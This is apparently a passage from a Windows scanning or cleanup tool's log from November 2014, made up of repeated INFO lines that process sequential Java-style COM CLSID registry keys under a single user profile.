[2014.11.10 19:31:16.155] - INFO: Processing clsid [\Registry\User\S-1-5-21-4159919823-1585328292-427241361-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0014-ABCDEFFEDCBA}]
[2014.11.10 19:31:16.155] - INFO: Processing clsid [\Registry\User\S-1-5-21-4159919823-1585328292-427241361-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0014-ABCDEFFEDCBB}]
[2014.11.10 19:31:16.155] - INFO: Processing clsid [\Registry\User\S-1-5-21-4159919823-1585328292-427241361-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0014-ABCDEFFEDCBC}]
[2014.11.10 19:31:16.155] - INFO: Processing clsid [\Registry\User\S-1-5-21-4159919823-1585328292-427241361-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0015-ABCDEFFEDCBA}]
[2014.11.10 19:31:16.155] - INFO: Processing clsid [\Registry\User\S-1-5-21-4159919823-1585328292-427241361-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0015-ABCDEFFEDCBB}]
[2014.11.10 19:31:16.155] - INFO: Processing clsid [\Registry\User\S-1-5-21-4159919823-1585328292-427241361-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0015-ABCDEFFEDCBC}]
[2014.11.10 19:31:16.155] - INFO: Processing clsid [\Registry\User\S-1-5-21-4159919823-1585328292-427241361-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0016-ABCDEFFEDCBA}]
[2014.11.10 19:31:16.155] - INFO: Processing clsid [\Registry\User\S-1-5-21-4159919823-1585328292-427241361-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0016-ABCDEFFEDCBB}]
[2014.11.10 19:31:16.155] - INFO: Processing clsid [\Registry\User\S-1-5-21-4159919823-1585328292-427241361-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0016-ABCDEFFEDCBC}]
[2014.11.10 19:31:16.155] - INFO: Processing clsid [\Registry\User\S-1-5-21-4159919823-1585328292-427241361-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0017-ABCDEFFEDCBA}]
[2014.11.10 19:31:16.155] - INFO: Processing clsid [\Registry\User\S-1-5-21-4159919823-1585328292-427241361-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0017-ABCDEFFEDCBB}]
[2014.11.10 19:31:16.155] - INFO: Processing clsid [\Registry\User\S-1-5-21-4159919823-1585328292-427241361-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0017-ABCDEFFEDCBC}]
[2014.11.10 19:31:16.155] - INFO: Processing clsid [\Registry\User\S-1-5-21-4159919823-1585328292-427241361-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0018-ABCDEFFEDCBA}]
[2014.11.10 19:31:16.155] - INFO: Processing clsid [\Registry\User\S-1-5-21-4159919823-1585328292-427241361-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0018-ABCDEFFEDCBB}]
[2014.11.10 19:31:16.155] - INFO: Processing clsid [\Registry\User\S-1-5-21-4159919823-1585328292-427241361-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0018-ABCDEFFEDCBC}]
[2014.11.10 19:31:16.155] - INFO: Processing clsid [\Registry\User\S-1-5-21-4159919823-1585328292-427241361-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0019-ABCDEFFEDCBA}]
[2014.11.10 19:31:16.155] - INFO: Processing clsid [\Registry\User\S-1-5-21-4159919823-1585328292-427241361-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0019-ABCDEFFEDCBB}]
[2014.11.10 19:31:16.155] - INFO: Processing clsid [\Registry\User\S-1-5-21-4159919823-1585328292-427241361-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0019-ABCDEFFEDCBC}]
[2014.11.10 19:31:16.155] - INFO: Processing clsid [\Registry\User\S-1-5-21-4159919823-1585328292-427241361-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0020-ABCDEFFEDCBA}]
[2014.11.10 19:31:16.155] - INFO: Processing clsid [\Registry\User\S-1-5-21-4159919823-1585328292-427241361-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0020-ABCDEFFEDCBB}]
[2014.11.10 19:31:16.155] - INFO: Processing clsid [\Registry\User\S-1-5-21-4159919823-1585328292-427241361-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0020-ABCDEFFEDCBC}]
[2014.11.10 19:31:16.155] - INFO: Processing clsid [\Registry\User\S-1-5-21-4159919823-1585328292-427241361-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0021-ABCDEFFEDCBA}]
[2014.11.10 19:31:16.155] - INFO: Processing clsid [\Registry\User\S-1-5-21-4159919823-1585328292-427241361-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0021-ABCDEFFEDCBB}]
[2014.11.10 19:31:16.155] - INFO: Processing clsid [\Registry\User\S-1-5-21-4159919823-1585328292-427241361-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0021-ABCDEFFEDCBC}]
[2014.11.10 19:31:16.155] - INFO: Processing clsid [\Registry\User\S-1-5-21-4159919823-1585328292-427241361-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0022-ABCDEFFEDCBA}]
[2014.11.10 19:31:16.155] - INFO: Processing clsid [\Registry\User\S-1-5-21-4159919823-1585328292-427241361-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0022-ABCDEFFEDCBB}]
[2014.11.10 19:31:16.155] - INFO: Processing clsid [\Registry\User\S-1-5-21-4159919823-1585328292-427241361-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0022-ABCDEFFEDCBC}]
[2014.11.10 19:31:16.155] - INFO: Processing clsid [\Registry\User\S-1-5-21-4159919823-1585328292-427241361-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0023-ABCDEFFEDCBA}]
[2014.11.10 19:31:16.155] - INFO: Processing clsid [\Registry\User\S-1-5-21-4159919823-1585328292-427241361-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0023-ABCDEFFEDCBB}]
[2014.11.10 19:31:16.155] - INFO: Processing clsid [\Registry\User\S-1-5-21-4159919823-1585328292-427241361-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0023-ABCDEFFEDCBC}]
[2014.11.10 19:31:16.155] - INFO: Processing clsid [\Registry\User\S-1-5-21-4159919823-1585328292-427241361-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0024-ABCDEFFEDCBA}]
[2014.11.10 19:31:16.155] - INFO: Processing clsid [\Registry\User\S-1-5-21-4159919823-1585328292-427241361-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0024-ABCDEFFEDCBB}]
[2014.11.10 19:31:16.155] - INFO: Processing clsid [\Registry\User\S-1-5-21-4159919823-1585328292-427241361-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0024-ABCDEFFEDCBC}]
[2014.11.10 19:31:16.155] - INFO: Processing clsid [\Registry\User\S-1-5-21-4159919823-1585328292-427241361-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0025-ABCDEFFEDCBA}]
[2014.11.10 19:31:16.155] - INFO: Processing clsid [\Registry\User\S-1-5-21-4159919823-1585328292-427241361-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0025-ABCDEFFEDCBB}]
[2014.11.10 19:31:16.155] - INFO: Processing clsid [\Registry\User\S-1-5-21-4159919823-1585328292-427241361-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0025-ABCDEFFEDCBC}]
[2014.11.10 19:31:16.155] - INFO: Processing clsid [\Registry\User\S-1-5-21-4159919823-1585328292-427241361-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0026-ABCDEFFEDCBA}]
[2014.11.10 19:31:16.155] - INFO: Processing clsid [\Registry\User\S-1-5-21-4159919823-1585328292-427241361-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0026-ABCDEFFEDCBB}]
[2014.11.10 19:31:16.155] - INFO: Processing clsid [\Registry\User\S-1-5-21-4159919823-1585328292-427241361-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0026-ABCDEFFEDCBC}]
[2014.11.10 19:31:16.155] - INFO: Processing clsid [\Registry\User\S-1-5-21-4159919823-1585328292-427241361-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0027-ABCDEFFEDCBA}]
[2014.11.10 19:31:16.155] - INFO: Processing clsid [\Registry\User\S-1-5-21-4159919823-1585328292-427241361-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0027-ABCDEFFEDCBB}]
[2014.11.10 19:31:16.155] - INFO: Processing clsid [\Registry\User\S-1-5-21-4159919823-1585328292-427241361-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0027-ABCDEFFEDCBC}]
[2014.11.10 19:31:16.155] - INFO: Processing clsid [\Registry\User\S-1-5-21-4159919823-1585328292-427241361-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0028-ABCDEFFEDCBA}]
[2014.11.10 19:31:16.155] - INFO: Processing clsid [\Registry\User\S-1-5-21-4159919823-1585328292-427241361-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0028-ABCDEFFEDCBB}]
[2014.11.10 19:31:16.155] - INFO: Processing clsid [\Registry\User\S-1-5-21-4159919823-1585328292-427241361-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0028-ABCDEFFEDCBC}]
[2014.11.10 19:31:16.155] - INFO: Processing clsid [\Registry\User\S-1-5-21-4159919823-1585328292-427241361-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0029-ABCDEFFEDCBA}]
[2014.11.10 19:31:16.155] - INFO: Processing clsid [\Registry\User\S-1-5-21-4159919823-1585328292-427241361-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0029-ABCDEFFEDCBB}]
[2014.11.10 19:31:16.155] - INFO: Processing clsid [\Registry\User\S-1-5-21-4159919823-1585328292-427241361-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0029-ABCDEFFEDCBC}]
[2014.11.10 19:31:16.155] - INFO: Processing clsid [\Registry\User\S-1-5-21-4159919823-1585328292-427241361-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0030-ABCDEFFEDCBA}]
[2014.11.10 19:31:16.155] - INFO: Processing clsid [\Registry\User\S-1-5-21-4159919823-1585328292-427241361-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0030-ABCDEFFEDCBB}]
[2014.11.10 19:31:16.155] - INFO: Processing clsid [\Registry\User\S-1-5-21-4159919823-1585328292-427241361-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0030-ABCDEFFEDCBC}]
[2014.11.10 19:31:16.155] - INFO: Processing clsid [\Registry\User\S-1-5-21-4159919823-1585328292-427241361-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0031-ABCDEFFEDCBA}]
[2014.11.10 19:31:16.155] - INFO: Processing clsid [\Registry\User\S-1-5-21-4159919823-1585328292-427241361-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0031-ABCDEFFEDCBB}]
[2014.11.10 19:31:16.155] - INFO: Processing clsid [\Registry\User\S-1-5-21-4159919823-1585328292-427241361-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0031-ABCDEFFEDCBC}]
[2014.11.10 19:31:16.155] - INFO: Processing clsid [\Registry\User\S-1-5-21-4159919823-1585328292-427241361-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0032-ABCDEFFEDCBA}]
[2014.11.10 19:31:16.155] - INFO: Processing clsid [\Registry\User\S-1-5-21-4159919823-1585328292-427241361-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0032-ABCDEFFEDCBB}]
[2014.11.10 19:31:16.171] - INFO: Processing clsid [\Registry\User\S-1-5-21-4159919823-1585328292-427241361-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0032-ABCDEFFEDCBC}]
[2014.11.10 19:31:16.171] - INFO: Processing clsid [\Registry\User\S-1-5-21-4159919823-1585328292-427241361-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0033-ABCDEFFEDCBA}]
[2014.11.10 19:31:16.171] - INFO: Processing clsid [\Registry\User\S-1-5-21-4159919823-1585328292-427241361-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0033-ABCDEFFEDCBB}]
[2014.11.10 19:31:16.171] - INFO: Processing clsid [\Registry\User\S-1-5-21-4159919823-1585328292-427241361-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0033-ABCDEFFEDCBC}]
[2014.11.10 19:31:16.171] - INFO: Processing clsid [\Registry\User\S-1-5-21-4159919823-1585328292-427241361-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0034-ABCDEFFEDCBA}]
[2014.11.10 19:31:16.171] - INFO: Processing clsid [\Registry\User\S-1-5-21-4159919823-1585328292-427241361-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0034-ABCDEFFEDCBB}]
[2014.11.10 19:31:16.171] - INFO: Processing clsid [\Registry\User\S-1-5-21-4159919823-1585328292-427241361-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0034-ABCDEFFEDCBC}]
[2014.11.10 19:31:16.171] - INFO: Processing clsid [\Registry\User\S-1-5-21-4159919823-1585328292-427241361-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0035-ABCDEFFEDCBA}]
[2014.11.10 19:31:16.171] - INFO: Processing clsid [\Registry\User\S-1-5-21-4159919823-1585328292-427241361-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0035-ABCDEFFEDCBB}]
[2014.11.10 19:31:16.171] - INFO: Processing clsid [\Registry\User\S-1-5-21-4159919823-1585328292-427241361-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0035-ABCDEFFEDCBC}]
[2014.11.10 19:31:16.171] - INFO: Processing clsid [\Registry\User\S-1-5-21-4159919823-1585328292-427241361-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0036-ABCDEFFEDCBA}]
[2014.11.10 19:31:16.171] - INFO: Processing clsid [\Registry\User\S-1-5-21-4159919823-1585328292-427241361-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0036-ABCDEFFEDCBB}]
[2014.11.10 19:31:16.171] - INFO: Processing clsid [\Registry\User\S-1-5-21-4159919823-1585328292-427241361-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0036-ABCDEFFEDCBC}]
[2014.11.10 19:31:16.171] - INFO: Processing clsid [\Registry\User\S-1-5-21-4159919823-1585328292-427241361-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0037-ABCDEFFEDCBA}]
[2014.11.10 19:31:16.171] - INFO: Processing clsid [\Registry\User\S-1-5-21-4159919823-1585328292-427241361-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0037-ABCDEFFEDCBB}]
[2014.11.10 19:31:16.171] - INFO: Processing clsid [\Registry\User\S-1-5-21-4159919823-1585328292-427241361-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0037-ABCDEFFEDCBC}]
[2014.11.10 19:31:16.171] - INFO: Processing clsid [\Registry\User\S-1-5-21-4159919823-1585328292-427241361-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0038-ABCDEFFEDCBA}]
[2014.11.10 19:31:16.171] - INFO: Processing clsid [\Registry\User\S-1-5-21-4159919823-1585328292-427241361-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0038-ABCDEFFEDCBB}]
[2014.11.10 19:31:16.171] - INFO: Processing clsid [\Registry\User\S-1-5-21-4159919823-1585328292-427241361-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0038-ABCDEFFEDCBC}]
[2014.11.10 19:31:16.171] - INFO: Processing clsid [\Registry\User\S-1-5-21-4159919823-1585328292-427241361-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0039-ABCDEFFEDCBA}]
[2014.11.10 19:31:16.171] - INFO: Processing clsid [\Registry\User\S-1-5-21-4159919823-1585328292-427241361-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0039-ABCDEFFEDCBB}]
[2014.11.10 19:31:16.171] - INFO: Processing clsid [\Registry\User\S-1-5-21-4159919823-1585328292-427241361-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0039-ABCDEFFEDCBC}]
[2014.11.10 19:31:16.171] - INFO: Processing clsid [\Registry\User\S-1-5-21-4159919823-1585328292-427241361-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0040-ABCDEFFEDCBA}]
[2014.11.10 19:31:16.171] - INFO: Processing clsid [\Registry\User\S-1-5-21-4159919823-1585328292-427241361-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0040-ABCDEFFEDCBB}]
[2014.11.10 19:31:16.171] - INFO: Processing clsid [\Registry\User\S-1-5-21-4159919823-1585328292-427241361-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0040-ABCDEFFEDCBC}]
[2014.11.10 19:31:16.171] - INFO: Processing clsid [\Registry\User\S-1-5-21-4159919823-1585328292-427241361-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0041-ABCDEFFEDCBA}]
[2014.11.10 19:31:16.171] - INFO: Processing clsid [\Registry\User\S-1-5-21-4159919823-1585328292-427241361-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0041-ABCDEFFEDCBB}]
[2014.11.10 19:31:16.171] - INFO: Processing clsid [\Registry\User\S-1-5-21-4159919823-1585328292-427241361-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0041-ABCDEFFEDCBC}]
[2014.11.10 19:31:16.171] - INFO: Processing clsid [\Registry\User\S-1-5-21-4159919823-1585328292-427241361-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0042-ABCDEFFEDCBA}]
[2014.11.10 19:31:16.171] - INFO: Processing clsid [\Registry\User\S-1-5-21-4159919823-1585328292-427241361-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0042-ABCDEFFEDCBB}]
[2014.11.10 19:31:16.171] - INFO: Processing clsid [\Registry\User\S-1-5-21-4159919823-1585328292-427241361-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0042-ABCDEFFEDCBC}]
[2014.11.10 19:31:16.171] - INFO: Processing clsid [\Registry\User\S-1-5-21-4159919823-1585328292-427241361-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0043-ABCDEFFEDCBA}]
[2014.11.10 19:31:16.171] - INFO: Processing clsid [\Registry\User\S-1-5-21-4159919823-1585328292-427241361-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0043-ABCDEFFEDCBB}]
[2014.11.10 19:31:16.171] - INFO: Processing clsid [\Registry\User\S-1-5-21-4159919823-1585328292-427241361-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0043-ABCDEFFEDCBC}]
[2014.11.10 19:31:16.171] - INFO: Processing clsid [\Registry\User\S-1-5-21-4159919823-1585328292-427241361-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0044-ABCDEFFEDCBA}]
[2014.11.10 19:31:16.171] - INFO: Processing clsid [\Registry\User\S-1-5-21-4159919823-1585328292-427241361-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0044-ABCDEFFEDCBB}]
[2014.11.10 19:31:16.171] - INFO: Processing clsid [\Registry\User\S-1-5-21-4159919823-1585328292-427241361-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0044-ABCDEFFEDCBC}]
[2014.11.10 19:31:16.171] - INFO: Processing clsid [\Registry\User\S-1-5-21-4159919823-1585328292-427241361-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0045-ABCDEFFEDCBA}]
[2014.11.10 19:31:16.171] - INFO: Processing clsid [\Registry\User\S-1-5-21-4159919823-1585328292-427241361-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0045-ABCDEFFEDCBB}]
[2014.11.10 19:31:16.171] - INFO: Processing clsid [\Registry\User\S-1-5-21-4159919823-1585328292-427241361-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0045-ABCDEFFEDCBC}]
[2014.11.10 19:31:16.171] - INFO: Processing clsid [\Registry\User\S-1-5-21-4159919823-1585328292-427241361-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0046-ABCDEFFEDCBA}]
[2014.11.10 19:31:16.171] - INFO: Processing clsid [\Registry\User\S-1-5-21-4159919823-1585328292-427241361-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0046-ABCDEFFEDCBB}]
[2014.11.10 19:31:16.171] - INFO: Processing clsid [\Registry\User\S-1-5-21-4159919823-1585328292-427241361-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0046-ABCDEFFEDCBC}]
[2014.11.10 19:31:16.171] - INFO: Processing clsid [\Registry\User\S-1-5-21-4159919823-1585328292-427241361-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0047-ABCDEFFEDCBA}]
[2014.11.10 19:31:16.171] - INFO: Processing clsid [\Registry\User\S-1-5-21-4159919823-1585328292-427241361-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0047-ABCDEFFEDCBB}]
[2014.11.10 19:31:16.171] - INFO: Processing clsid [\Registry\User\S-1-5-21-4159919823-1585328292-427241361-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0047-ABCDEFFEDCBC}]
[2014.11.10 19:31:16.171] - INFO: Processing clsid [\Registry\User\S-1-5-21-4159919823-1585328292-427241361-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0048-ABCDEFFEDCBA}]
[2014.11.10 19:31:16.171] - INFO: Processing clsid [\Registry\User\S-1-5-21-4159919823-1585328292-427241361-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0048-ABCDEFFEDCBB}]
[2014.11.10 19:31:16.171] - INFO: Processing clsid [\Registry\User\S-1-5-21-4159919823-1585328292-427241361-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0048-ABCDEFFEDCBC}]
[2014.11.10 19:31:16.171] - INFO: Processing clsid [\Registry\User\S-1-5-21-4159919823-1585328292-427241361-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0049-ABCDEFFEDCBA}]
[2014.11.10 19:31:16.171] - INFO: Processing clsid [\Registry\User\S-1-5-21-4159919823-1585328292-427241361-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0049-ABCDEFFEDCBB}]
[2014.11.10 19:31:16.171] - INFO: Processing clsid [\Registry\User\S-1-5-21-4159919823-1585328292-427241361-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0049-ABCDEFFEDCBC}]
[2014.11.10 19:31:16.171] - INFO: Processing clsid [\Registry\User\S-1-5-21-4159919823-1585328292-427241361-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0050-ABCDEFFEDCBA}]
[2014.11.10 19:31:16.171] - INFO: Processing clsid [\Registry\User\S-1-5-21-4159919823-1585328292-427241361-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0050-ABCDEFFEDCBB}]
[2014.11.10 19:31:16.171] - INFO: Processing clsid [\Registry\User\S-1-5-21-4159919823-1585328292-427241361-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0050-ABCDEFFEDCBC}]
[2014.11.10 19:31:16.171] - INFO: Processing clsid [\Registry\User\S-1-5-21-4159919823-1585328292-427241361-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0051-ABCDEFFEDCBA}]
[2014.11.10 19:31:16.171] - INFO: Processing clsid [\Registry\User\S-1-5-21-4159919823-1585328292-427241361-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0051-ABCDEFFEDCBB}]
[2014.11.10 19:31:16.171] - INFO: Processing clsid [\Registry\User\S-1-5-21-4159919823-1585328292-427241361-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0051-ABCDEFFEDCBC}]
[2014.11.10 19:31:16.171] - INFO: Processing clsid [\Registry\User\S-1-5-21-4159919823-1585328292-427241361-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0052-ABCDEFFEDCBA}]
[2014.11.10 19:31:16.171] - INFO: Processing clsid [\Registry\User\S-1-5-21-4159919823-1585328292-427241361-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0052-ABCDEFFEDCBB}]
[2014.11.10 19:31:16.171] - INFO: Processing clsid [\Registry\User\S-1-5-21-4159919823-1585328292-427241361-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0052-ABCDEFFEDCBC}]
[2014.11.10 19:31:16.171] - INFO: Processing clsid [\Registry\User\S-1-5-21-4159919823-1585328292-427241361-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0053-ABCDEFFEDCBA}]
[2014.11.10 19:31:16.171] - INFO: Processing clsid [\Registry\User\S-1-5-21-4159919823-1585328292-427241361-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0053-ABCDEFFEDCBB}]
[2014.11.10 19:31:16.171] - INFO: Processing clsid [\Registry\User\S-1-5-21-4159919823-1585328292-427241361-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0053-ABCDEFFEDCBC}]
[2014.11.10 19:31:16.171] - INFO: Processing clsid [\Registry\User\S-1-5-21-4159919823-1585328292-427241361-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0054-ABCDEFFEDCBA}]
[2014.11.10 19:31:16.171] - INFO: Processing clsid [\Registry\User\S-1-5-21-4159919823-1585328292-427241361-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0054-ABCDEFFEDCBB}]
[2014.11.10 19:31:16.171] - INFO: Processing clsid [\Registry\User\S-1-5-21-4159919823-1585328292-427241361-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0054-ABCDEFFEDCBC}]
[2014.11.10 19:31:16.171] - INFO: Processing clsid [\Registry\User\S-1-5-21-4159919823-1585328292-427241361-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0055-ABCDEFFEDCBA}]
[2014.11.10 19:31:16.171] - INFO: Processing clsid [\Registry\User\S-1-5-21-4159919823-1585328292-427241361-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0055-ABCDEFFEDCBB}]
[2014.11.10 19:31:16.171] - INFO: Processing clsid [\Registry\User\S-1-5-21-4159919823-1585328292-427241361-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0055-ABCDEFFEDCBC}]
[2014.11.10 19:31:16.171] - INFO: Processing clsid [\Registry\User\S-1-5-21-4159919823-1585328292-427241361-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0056-ABCDEFFEDCBA}]
[2014.11.10 19:31:16.171] - INFO: Processing clsid [\Registry\User\S-1-5-21-4159919823-1585328292-427241361-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0056-ABCDEFFEDCBB}]
[2014.11.10 19:31:16.171] - INFO: Processing clsid [\Registry\User\S-1-5-21-4159919823-1585328292-427241361-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0056-ABCDEFFEDCBC}]
[2014.11.10 19:31:16.171] - INFO: Processing clsid [\Registry\User\S-1-5-21-4159919823-1585328292-427241361-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0057-ABCDEFFEDCBA}]
[2014.11.10 19:31:16.171] - INFO: Processing clsid [\Registry\User\S-1-5-21-4159919823-1585328292-427241361-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0057-ABCDEFFEDCBB}]
[2014.11.10 19:31:16.171] - INFO: Processing clsid [\Registry\User\S-1-5-21-4159919823-1585328292-427241361-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0057-ABCDEFFEDCBC}]
[2014.11.10 19:31:16.171] - INFO: Processing clsid [\Registry\User\S-1-5-21-4159919823-1585328292-427241361-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0058-ABCDEFFEDCBA}]
[2014.11.10 19:31:16.171] - INFO: Processing clsid [\Registry\User\S-1-5-21-4159919823-1585328292-427241361-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0058-ABCDEFFEDCBB}]
[2014.11.10 19:31:16.171] - INFO: Processing clsid [\Registry\User\S-1-5-21-4159919823-1585328292-427241361-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0058-ABCDEFFEDCBC}]
